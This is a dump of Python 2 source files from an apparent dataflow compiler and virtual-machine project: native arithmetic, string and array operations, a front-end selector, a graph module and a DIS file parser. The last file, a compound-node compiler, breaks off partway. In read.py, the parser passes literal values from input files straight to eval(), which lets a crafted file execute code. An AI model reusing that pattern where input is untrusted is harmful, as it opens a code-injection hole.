OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \package natives\n# \brief DVM Native Operations\n# \n# This module defines all of the native DVM\n# operations.\n##\n\nimport math\nimport copy\n\n# ------------- #\n# Type Creation #\n# ------------- #\n\n## Return the DVM void type.\ndef dvm_Void(): return None\n## Create a DVM Boolean\ndef dvm_Bool(x): return bool(x)\n## Create a DVM Integer\ndef dvm_Int(x): return int(x)\n## Create a DVM Float\ndef dvm_Float(x): return float(x)\n## Create a DVM String\ndef dvm_String(x): return str(x)\n\n## \n# Create a DVM Array\n# \n# DVM arrays are indexed starting from 0.\n##\ndef dvm_Array(*x): return list(x)\n\n##\n# Create a DVM Tuple\n# \n# DVM Tuples are indexed starting from 0\n##\ndef dvm_tuple(*x): return tuple(x)\n\n# ----------------- #\n# General Operators #\n# ----------------- #\n\n##\n# Do nothing.\n#\n# \param x Any number of inputs\n# \return Nothing.\n##\ndef dvm_noOp(*x): pass\n\n##\n# See if the element is void.\n# \param x A parameter of any type.\n# \return True if x is void.\n##\ndef dvm_isVoid(x): return x is None\n\n##\n# Check if 2 elements are equal.\n#\n# \param l, r parameters of any type. \n# \return True if l and r are equal.\n##\ndef dvm_equals(l, r): return l == r\n\n##\n# Check if 2 elements are not equal.\n#\n# \param l, r parameters of any type. \n# \return True if l and r are **not** equal\n##\ndef dvm_notEqual(l, r): return l != r\n\n# ----------------- #\n# Boolean Operators #\n# ----------------- #\n\n## \n# Logical and\n#\n# \param l, r booleans\n# \return A boolean\n##\ndef dvm_and(l, r): return l and r\n\n## \n# Logical Or\n#\n# \param l, r booleans\n# \return A boolean\n##\ndef dvm_or(l, r): return l or r\n\n##\n# Logical xor\n#\n# \param l, r booleans\n# \return a boolean\n##\ndef dvm_xor(l, r): return l ^ r\n\n##\n# Negation\n#\n# \param x a boolean\n# \return the negated boolean\n##\ndef dvm_not(x): return not x\n\n# ----------------- #\n# Numeric Operators #\n# ----------------- #\n\n## \n# Negation\n#\n# \param x a number\n# \return negated x\n##\ndef dvm_neg(x): return - x\n\n##\n# Absolute value\n# \n# \param x a number\n# \return The absolute value of x\n##\ndef dvm_abs(x): return math.fabs(x)\n\n##\n# Addition.\n#\n# \param l, r numeric parameters\n# \return A number\n##\ndef dvm_add(l, r): return l + r\n\n##\n# Subtraction.\n#\n# \param l, r numeric parameters\n# \return A number\n##\ndef dvm_sub(l, r): return l - r\n\n##\n# Multiplication.\n#\n# \param l, r numeric parameters\n# \return A number\n##\ndef dvm_mul(l, r): return l * r\n\n##\n# Division.\n#\n# \param l, r numeric parameters\n# \return A number\n##\ndef dvm_div(l, r): return l / (r * 1.0)\n\n##\n# Modulo.\n#\n# \param l,r numbers\n# \return modulo of l and r \n##\ndef dvm_mod(l, r): return l % r\n\n##\n# Exponent.\n#\n# \param l, r numbers\n# \return A number\n##\ndef dvm_exp(l, r): return l ** r\n\n##\n# Round down\n#\n# \param x A number\n# \return A number\n##\ndef dvm_floor(x): return math.floor(x)\n\n##\n# Round up\n#\n# \param x A number\n# \return A number\n##\ndef dvm_ceil(x): return math.ceil(x)\n\n## \n# Minimum\n#\n# \param l, r numeric parameters\n# \return A number\n##\ndef dvm_min(l, r): return min(l, r)\n\n## \n# Maximum\n#\n# \param l, r numeric 
parameters\n# \return A number\n##\ndef dvm_max(l, r): return max(l, r)\n\n# ------------------ #\n# Numeric Comparison #\n# ------------------ #\n\n##\n# Smaller than\n#\n# \param l, r numbers\n# \return true if l < r\n##\ndef dvm_less(l, r): return l < r\n\n##\n# Greater than\n#\n# \param l, r numbers\n# \return true if l > r\n##\ndef dvm_more(l, r): return l > r\n\n##\n# Smaller than or equal\n#\n# \param l, r numbers\n# \return true if l <= r\n##\ndef dvm_less_eq(l, r): return l <= r\n\n##\n# Greater than or equal\n#\n# \param l, r numbers\n# \return true if l >= r\n##\ndef dvm_more_eq(l, r): return l >= r\n\n# ----------------- #\n# String Operations #\n# ----------------- #\n\n##\n# See if a string contains a value.\n#\n# \param str, x strings\n# \return True if x is an element of str\n##\ndef dvm_str_contains(str, x): return x in str\n\n##\n# Return the idx of x in str.\n#\n# \param str, x strings\n# \return \n#\tthe idx of x in str.\n#\t-1 if x is not in str.\n##\ndef dvm_str_find(str, x): return str.find(x)\n\n##\n# Convert a string to upper case.\n#\n# \param str a string\n# \return the string in upper case.\n##\ndef dvm_str_upper(str): return str.upper()\n\n##\n# Convert a string to lower case.\n#\n# \param str a string\n# \return the string in lower case.\n##\ndef dvm_str_lower(str): return str.lower()\n\n##\n# Get a substring.\n#\n# \param str a string\n# \param start the index to start at.\n# \param stop the index to stop at.\n##\ndef dvm_str_sub(str, start, stop): return str[start:stop]\n\n##\n# Reverse a string.\n#\n# \param str a string\n# \return the reversed string\n##\ndef dvm_str_reverse(str): return str[::-1]\n\n##\n# Append 2 strings.\n# \n# \param l, r strings\n# \return the combination of 2 strings.\n##\ndef dvm_str_append(l, r): return l + r\n\n# ---------------- #\n# Array Operations #\n# ---------------- #\n\n##\n# See if an array is empty.\n#\n# \param arr the array\n# \return True if the array is empty\n##\ndef dvm_arr_isEmpty(arr): return arr == []\n\n##\n# Get the length of an array.\n#\n# \param arr An array\n# \return the length of the array.\n##\ndef dvm_arr_length(arr): return len(arr)\n\n##\n# Get the upper bound of an array.\n#\n# \param arr An array\n# \return highest index of the array.\n##\ndef dvm_arr_bound(arr): return len(arr) - 1\n\n##\n# Create an empty array\n##\ndef dvm_arr_empty(): return []\n\n##\n# Create an array filled with an element\n#\n# \param length the length of the array\n# \param fill the element to fill the array with\n# \return the new array\n##\ndef dvm_arr_create(length, fill): return [fill] * length\n\n##\n# Get an element from the array.\n#\n# \param arr the array to take an element from\n# \param idx the index to access\n# \return the element arr[idx]\n##\ndef dvm_arr_get(arr, idx): return arr[idx]\n\n##\n# Create a new array with a different\n# element at idx.\n#\n# \param arr the array\n# \param idx the index to modify\n# \param el the element to insert\n# \return \n#\ta new array that is identical to\n#\tarr, with the element at idx replaced by el\n##\ndef dvm_arr_set(arr, idx, el):\n\tres = copy.deepcopy(arr)\n\tres[idx] = el\n\treturn res\n
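\n# A quick sanity sketch (illustrative only, not part of the original file);\n# it highlights that these array operations never mutate their input:\n#\n#   a = [1, 2, 3]\n#   dvm_arr_set(a, 0, 9)  # => [9, 2, 3]\n#   a                     # => still [1, 2, 3]; a fresh copy is returned\n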
\n##\n# Insert elements into an array.\n#\n# e.g: \n# \n# test = [1,2,3]\n# >>> natives.dvm_arr_insert(test, 1, 'a', 'b')\n# [1, 'a', 'b', 2, 3]\n#\n# \param arr the array\n# \param idx the start index\n# \param el the elements to include.\n# \return \n#\tA new array, which consists of arr\n#\twith the elements added at index.\n#\tThe elements are inserted at index, but \n#\tdo not replace anything after index.\n##\ndef dvm_arr_insert(arr, idx, *el): \n\tres = copy.deepcopy(arr)\n\tpre = res[:idx]\n\tpos = res[idx:]\n\treturn pre + list(el) + pos\n\n##\n# Replace elements in an array. \n# Similar to dvm_arr_insert, but\n# replaces the elements starting at idx.\n#\n# e.g: \n# \n# test = [1,2,3]\n# >>> natives.dvm_arr_replace(test, 1, 'a', 'b')\n# [1, 'a', 'b']\n#\n# \param arr the array\n# \param idx the start index\n# \param el the elements to include.\n# \return \n#\t\tA new array, with the elements\n#\t\tstarting at idx replaced by el.\n##\ndef dvm_arr_replace(arr, idx, *el):\n\tres = copy.deepcopy(arr)\n\tres[idx:idx + len(el)] = el\n\treturn res\n\n##\n# Array concatenation.\n#\n# \param l,r arrays.\n# \param rest (optional) other arrays to concatenate.\n# \return concatenation of l and r.\n##\ndef dvm_arr_catenate(l, r, *rest):\n\tif rest:\n\t\tres = l + r\n\t\tfor lst in rest: res += lst\n\t\treturn res\n\telse: \n\t\treturn l + r\n\n##\n# Add an element to the start of an array.\n#\n# \param arr An array\n# \param el The element to add.\n# \return \n#\t\ta copy of arr with el \n#\t\tadded in front.\n##\ndef dvm_arr_add_front(arr, el):\n\treturn [el] + arr\n\n##\n# Add an element to the back of an array.\n#\n# \param arr An array\n# \param el The element to add.\n# \return \n#\t\ta copy of arr with el \n#\t\tadded to the back.\n##\ndef dvm_arr_add_back(arr, el):\n\treturn arr + [el]\n\n##\n# Get a subset of an array\n#\n# \param arr An array\n# \param start The idx to start at.\n# \param stop The idx to stop at.\n# \return \n#\t\tAn array containing the elements of \n#\t\tarr between start and stop.\n##\ndef dvm_arr_sub(arr, start, stop):\n\treturn arr[start:stop]\n\n##\n# Create an array with the value of the\n# first array if the value of the second\n# array is true.\n#\n# \param arr\n#\t\tThe array to gather elements from.\n# \param bools\n#\t\tAn array of booleans.\n# \return\n#\t\tAn array with all the elements of arr for \n#\t\twhich the corresponding element in bools is true.\n##\ndef dvm_arr_prune(arr, bools):\n\treturn [el[0] for el in zip(arr, bools) if el[1]]\n\n# ---------------- #\n# Tuple Operations #\n# ---------------- #\n\n## \n# Access an element of a tuple.\n#\n# \param tup A tuple\n# \param idx An integer\n# \return The element found at idx in the tuple.\n##\ndef dvm_tup_get(tup, idx):\n\treturn tup[idx]\n\n# ----- #\n# Other #\n# ----- #\n\n##\n# Generate a range.\n# \param start, stop The lower and upper bounds of the range\n# \return An array containing [start..stop]\n##\ndef dvm_range(start, stop): return range(start, stop + 1)\n\n## \n# Contains references to all\n# the operations.\n##\noperations = { \n\t'void' : dvm_Void,\n\t'bool' : dvm_Bool,\n\t'int' : dvm_Int,\n\t'float' : dvm_Float,\n\t'string' : dvm_String,\n\t'array' : dvm_Array,\n\t'tuple' : dvm_tuple,\n\n\t'noOp' : dvm_noOp,\n\t'isVoid' : dvm_isVoid,\n\t'equals' : dvm_equals,\n\t'notEq' : dvm_notEqual,\n\n\t'and' : dvm_and,\n\t'or' : dvm_or,\n\t'xor' : dvm_xor,\n\t'not' : dvm_not,\n\n\t'neg' : dvm_neg,\n\t'abs' : dvm_abs,\n\t'add' : dvm_add,\n\t'sub' : dvm_sub,\n\t'mul' : dvm_mul,\n\t'div' : dvm_div,\n\t'mod' : dvm_mod,\n\t'exp' : dvm_exp,\n\t'floor' : dvm_floor,\n\t'ceil' : dvm_ceil,\n\t'min' : dvm_min,\n\t'max' : dvm_max,\n\t'less' : dvm_less,\n\t'more' : dvm_more,\n\t'lessEq' : dvm_less_eq,\n\t'moreEq' : dvm_more_eq,\n\n\t'strContains' : dvm_str_contains,\n\t'strFind' : dvm_str_find,\n\t'strUpper' : dvm_str_upper,\n\t'strLower' : dvm_str_lower,\n\t'strSub' : dvm_str_sub,\n\t'strRev' : dvm_str_reverse,\n\t'strApp' : dvm_str_append,\n\n\t'arrIsEmpty' : dvm_arr_isEmpty,\n\t'arrLen' : dvm_arr_length,\n\t'arrBound' : dvm_arr_bound,\n\t'arrEmpty' : dvm_arr_empty,\n\t'arrCreate' : dvm_arr_create,\n\t'arrGet' : dvm_arr_get,\n\t'arrSet' : dvm_arr_set,\n\t'arrIns' : dvm_arr_insert,\n\t'arrRepl' : dvm_arr_replace,\n\t'arrCat' : dvm_arr_catenate,\n\t'arrAddFrnt' : dvm_arr_add_front,\n\t'arrAddBck' : dvm_arr_add_back,\n\t'arrSub' : dvm_arr_sub,\n\t'arrPrune' : dvm_arr_prune,\n\n\t'tupGet' : dvm_tup_get,\n\t'range' : dvm_range\n}\n
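\n# A minimal dispatch sketch (illustrative only, not part of the original\n# table); an interpreter looks up an opcode string and applies the callable:\n#\n#   operations['add'](1, 2)              # => 3\n#   operations['arrCat']([1], [2], [3])  # => [1, 2, 3]\n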
" }, { "alpha_fraction": 0.7157546877861023, "alphanum_fraction": 0.7194271087646484, "avg_line_length": 23.990825653076172, "blob_id": "37365de106ffff2886d717c1e9cf5d826224908d", "content_id": "db618fb7e405e3d71724d2e7f1237029b6c24080", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2723, "license_type": "no_license", "max_line_length": 80, "num_lines": 109, "path": "/DISc/frontEnd/__init__.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \package frontEnd\n# \brief DISc Frontend Selector\n# \n# This module serves as an interface to any frontend that the user may choose.\n# Any frontEnd module should define a fromString function that is reachable from\n# its package. 
(defined in the __init__ file of this package).\n##\n\nimport importlib\n\nimport logging\nlog = logging.getLogger(__name__)\n\n## \n# Store the currently selected\n# front end.\n##\nfrontEnd = None\n\n##\n# Store the file extensions \n# and the front ends they map to.\n##\nfrontEnds = {\n\t'.sis' : 'Sisal',\n\t'.if1' : 'IF1'\n}\n\n##\n# Set up the front end from the\n# command line arguments.\n#\n# \\param extension\n#\t\tThe extension of the input file.\n# \\param flagVal\n#\t\tThe value of the front end flag.\n##\ndef setUp(extension, flagVal):\n\tif flagVal:\n\t\tset(flagVal)\n\telse:\n\t\tset(frontEnds[extension])\n\n##\n# Select a frontend to use.\n#\n# \\param name \n#\t\tA name that matches a package in the\n#\t\tfrontEnd package.\n##\ndef set(name):\n\tglobal frontEnd\n\ttry:\n\t\tfrontEnd = importlib.import_module('.%s' % name, __name__)\n\texcept ImportError:\n\t\tlog.error(\"Frontend '%s' not found.\", name)\n\n##\n# Convert the given string to IGR.\n# This simply calls the same method on\n# the selected frontend.\n#\n# \\param str\n#\t\tThe string to convert to IGR.\n##\ndef fromString(str):\n\tif frontEnd:\n\t\tfrontEnd.fromString(str)\n\telse:\n\t\tlog.error(\"No frontEnd specified...\")\n\n##\n# Convert the contents of a file to\n# IGR. This simply calls fromString()\n# on the contents of the file.\n#\n# \\param path\n#\t\tThe path of the file.\n##\ndef fromFile(path):\n\tfile = open(path, 'r')\n\tfromString(file.read())" }, { "alpha_fraction": 0.725257933139801, "alphanum_fraction": 0.7283148765563965, "avg_line_length": 26.27083396911621, "blob_id": "31ee3329d3404df8f42a0e3dccb503d925caf1f4", "content_id": "7d65aef5c4a2783189abc40f78984a1dd76be2dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2617, "license_type": "no_license", "max_line_length": 79, "num_lines": 96, "path": "/DISc/IGR/graph.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# graph.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.graph\n# \\brief Complete program\n# \n# This defines the complete program graph. 
All of the subgraphs\n# as well as their names can be found here.\n#\n# This file also defines a few top level functions that \n# facilitate adding nodes, ports and literals to the IGR.\n##\n\n## All of the functions in the program \n__SUBGRAPHS__ = []\n\n## The function names, combined with the subgraph they map to.\n__FUNCTION_NAMES__ = {}\n\n##\n# Add a subgraph to the program.\n#\n# \\param subGraph\n#\t\tThe subgraph to add.\n## \ndef addSubGraph(subGraph):\n\t__SUBGRAPHS__.append(subGraph)\n\n##\n# Bind a subgraph to its name.\n#\n# \\param graph\n#\t\tThe graph to add. Its name \n#\t\tfield will be used to retrieve it.\n##\ndef bindName(graph):\n\t__FUNCTION_NAMES__.update({graph.name : graph})\n\n##\n# Get a list of all the non-compound subgraphs\n# in the program.\n#\n# \\return \n#\t \tAll the non compound subgraphs in the program.\n## \ndef getSubGraphs():\n\treturn __SUBGRAPHS__\n\n##\n# Get a subgraph by name.\n#\n# \\param name\n#\t\tThe name of the subgraph \n# \t\twe want to retrieve.\n# \\return\n#\t\tThe subgraph\n##\ndef getSubGraph(name):\n\treturn __FUNCTION_NAMES__[name]\n\n##\n# Remove a subgraph from the program.\n# This only works for subgraphs that are\n# not a part of a compound node.\n# Care should be taken to avoid calling this method\n# while iterating over the subgraph list.\n#\n# \\param subGraph\n#\t\tA reference to the subgraph to remove.\n##\ndef removeSubGraph(subGraph):\n\t__SUBGRAPHS__.remove(subGraph)" }, { "alpha_fraction": 0.6785436272621155, "alphanum_fraction": 0.684922993183136, "avg_line_length": 22.628677368164062, "blob_id": "0f5ca2aa7c831fec2c47b7baf06d3aef1f1c8152", "content_id": "8ac02c4a080ecad5cadcb0fad3feb02f6b5935ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6427, "license_type": "no_license", "max_line_length": 87, "num_lines": 272, "path": "/DVM/read.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# read.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package read\n# \\brief DIS parser\n#\n# This module defines the functions necessary to\n# read DIS files.\n##\n\nimport sys\nimport core\nimport user\nimport natives\n\nimport logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.WARNING)\n\nchunk = None\n\n# ----------- #\n# Convenience #\n# ----------- #\n\n## Parse a value string.\ndef parseValue(str):\n\ttry:\n\t\treturn eval(str)\n\texcept SyntaxError, e:\n\t\tlog.error(\"Invalid literal syntax: %s\", e.text)\n\t\tsys.exit(user.EXIT_INPUT)\n\n##\n# Extract the value of a statement.\n#\n# The value of a statement is found after the statement,\n# and separated from the statement by a `<=` and a space.\n##\ndef extractValue(stmt):\n\tvalStart = stmt.find('<= ')\n\n\tif valStart == -1:\n\t\tlog.error(\"Missing value in statement: %s\", stmt)\n\t\treturn\n\n\tval = stmt[valStart + 3:]\n\treturn parseValue(val)\n\n## \n# Get a list of instruction addresses\n# from the array, starting at idx start.\n##\ndef getInstructionList(arr, start):\n\ttry:\n\t\treturn [(int(arr[i]), int(arr[i+1])) for i in xrange(start, len(arr), 2)]\n\texcept IndexError:\n\t\tlog.error(\"Invalid destination list encountered: %s\", arr)\n\t\treturn []\n\n# ------------ #\n# Instructions #\n# ------------ #\n\n## Create a sink.\ndef createSink(arr, stmt):\n\treturn core.addSink()\n\n## Create a constant.\ndef createConstant(arr, stmt):\n\treturn core.addConstant(extractValue(stmt))\n\n## Create a stop instruction\ndef createStop(arr, stmt):\n\treturn core.addStopInstruction()\n##\n# Create a start instruction.\n#\n# Creates a sink and adds the amount\n# of incoming elements to the runtime.\n##\ndef createStart(arr, stmt):\n\tcore.setIn(int(arr[3]))\n\treturn createSink(arr, stmt)\n\n## Create a context change instruction.\ndef createContextChange(arr, stmt):\n\tchanges = int(arr[3])\n\treturns = int(arr[4])\n\tdstChnk = int(arr[5])\n\tdstInst = int(arr[6])\n\tretChnk = int(arr[7])\n\tretInst = int(arr[8])\n\treturn core.addContextChange(changes, returns, (dstChnk, dstInst), (retChnk, retInst))\n\n## Create a context map function\ndef createSplit(arr, stmt):\n\tbinds = int(arr[3])\n\tdestChnk = int(arr[4])\n\tdestInst = int(arr[5])\n\tmergeChnk = int(arr[6])\n\tmergeInst = int(arr[7])\n\treturn core.addSplit(binds, (destChnk, destInst), (mergeChnk, mergeInst))\n\n## Create a context restore\ndef createContextRestore(arr, stmt):\n\treturn core.addContextRestore()\n\n## Create an operation\ndef createOperation(arr, stmt):\n\topCode = arr[3]\n\tinputs = int(arr[4])\n\n\ttry:\n\t\top = natives.operations[opCode]\n\t\treturn core.addOperationInstruction(op, inputs)\n\texcept KeyError:\n\t\tlog.error(\"Invalid operation key: %s, using noOp instead.\", opCode)\n\t\treturn core.addOperationInstruction(natives.dvm_noOp, inputs)\n\n## Create a switch instruction.\ndef createSwitch(arr, stmt):\n\treturn core.addSwitch(getInstructionList(arr, 3))\n\n## \n# Defines the operation codes \n# and the functions to create them.\n##\ninstructions = {\n\t'SWI' : createSwitch,\n\t'SNK' : createSink,\n\t'BGN' : createStart,\n\t'STP' : createStop,\n\t'SPL' : createSplit,\n\t'CHN' : createContextChange,\n\t'RST' : createContextRestore,\n\t'OPR' : createOperation,\n\t'CNS' : createConstant\n}\n\n# ---------- #\n# Statements #\n# ---------- #\n\n##\n# Parse an instruction declaration.\n# Verify that it ended up in the correct chunk.\n##\ndef parseInst(arr, stmt):\n\tcode = arr[1]\n\tkey = instructions[code](arr, stmt)\n\tif key != (chunk, int(arr[2])):\n\t\tlog.error(\"Instruction %s added to memory with incorrect key %s\", arr, key)\n\telse: log.info(\"Added instruction with key %s\", key)\n\n##\n# Parse a chunk declaration.\n#\n# A chunk declaration has the form:\n# `CHUNK <idx>`\n##\ndef parseChunk(arr, stmt):\n\tglobal chunk\n\tchunk = int(arr[1])\n\n\tlog.info(\"Starting chunk: %d\", chunk)\n\n##\n# Parse a literal declaration.\n#\n# A literal declaration has the form:\n# `LITR <instruction> <port> <= <value>`\n##\ndef parseLit(arr, stmt):\n\tinst = int(arr[1])\n\tport = int(arr[2])\n\n\tlit = extractValue(stmt)\n\n\tlog.info(\"Adding Literal: '%s' to c %d i %d p %d\", \n\t\tlit, chunk, inst, port)\n\n\tcore.addLiteral((chunk, inst), port, lit)\n\n##\n# Parse a link statement.\n#\n# A link statement has the form:\n# `LINK <from> -> <to>` where from and\n# to have the form:\n# `<chunk> <instruction> <port>`\n##\ndef parseLink(arr, stmt):\n\tsrcChnk = int(arr[1])\n\tsrcInst = int(arr[2])\n\tsrcPort = int(arr[3])\n\n\tdstChnk = int(arr[5])\n\tdstInst = int(arr[6])\n\tdstPort = int(arr[7])\n\n\tlog.info(\"Adding link from: c %d i %d p %d to: c %d i %d p %d\", \n\t\tsrcChnk, srcInst, srcPort, dstChnk, dstInst, dstPort)\n\n\tcore.addDestination(\n\t\t(srcChnk, srcInst), srcPort, \n\t\t(dstChnk, dstInst), dstPort)\n\n##\n# Parse a trivial statement.\n#\n# A trivial statement has the form:\n# `TRIV <= <value>`\n##\ndef parseTriv(arr, stmt):\n\tval = extractValue(stmt)\n\tcore.addTrivial(val)\n\n# ------- #\n# General #\n# ------- #\n\n## Functions to parse the various statements.\nfunctions = {\n\t'CHUNK' : parseChunk,\n\t'INST' : parseInst,\n\t'LINK' : parseLink,\n\t'LITR' : parseLit,\n\t'TRIV' : parseTriv\n}\n\n## Parse a single DIS line.\ndef parseLine(line):\n\tstmt = line.split('$')[0]\n\tstmt = stmt.strip()\n\tif len(stmt) != 0:\n\t\tlog.debug(\"Reading statement: '%s'\", stmt)\n\t\tarr = stmt.split()\n\t\tkey = arr[0]\n\t\tfunctions[key](arr, stmt)\n\n## \n# Parse a dis string\n##\ndef parse(str):\n\tfor line in str.split('\\\\n'):\n\t\tparseLine(line)\n\tlog.info(\"Finished parsing, instruction memory: %s\", core.memory.memory())\n" }, { "alpha_fraction": 0.698248565196991, "alphanum_fraction": 0.7064781785011292, "avg_line_length": 27.214284896850586, "blob_id": "bb0ea822373102123f30dc6c4e8971bf980a7c9d", "content_id": "63f0eb012ee36aab0bd888367f6417ba0eaf6421", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4739, "license_type": "no_license", "max_line_length": 79, "num_lines": 168, "path": "/DISc/backEnd/DVM/compoundConverter.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# compoundConverter.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this
permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.compoundConverter\n# \\brief IGR compound node compiler\n#\n# This module contains functions for the compilation of compound nodes.\n# It's worth noting that the links to and from a compound node are made by\n# the regular nodeConverter.\n##\n\nimport graphConverter\n\n# ----------- #\n# Select Node #\n# ----------- #\n\n##\n# Ensure all the subgraphs\n# link to the exit sink.\n##\ndef selectStart(dis, comp):\n\tdis.indent += 1\n\n\tretKey = dis.getFromKey(comp)\n\tfor sg in comp.subGraphs[1:]:\n\t\t# Everything that links to exit node of sg will\n\t\t# now link to the common exit sink instead.\n\t\tdis.linkNode(sg.exit, retKey, retKey)\n\t\tif sg.exit in sg.nodes:\n\t\t\t# Make sure we don't parse exit node,\n\t\t\t# but keep it as attribute.\n\t\t\tsg.nodes.remove(sg.exit)\n\n##\n# Add all the subgraph entry points\n# to the destination list of select.\n# Restore exit nodes.\n##\ndef selectStop(dis, comp, idx):\n\tdis.indent -= 1\n\n\tdstLst = []\n\tfor sg in comp.subGraphs[1:]:\n\t\tpair = dis.getToKey(sg.entry)\n\t\tdstLst.append(str(pair[0]))\n\t\tdstLst.append(str(pair[1]))\n\t\tsg.nodes.insert(0, sg.exit)\n\tdis.modifyString(0, idx, lambda str : str + ' '.join(dstLst))\n\n##\n# Convert a select node.\n#\n# First, we add the node itself to dis.\n# We add a sink and a switch. 
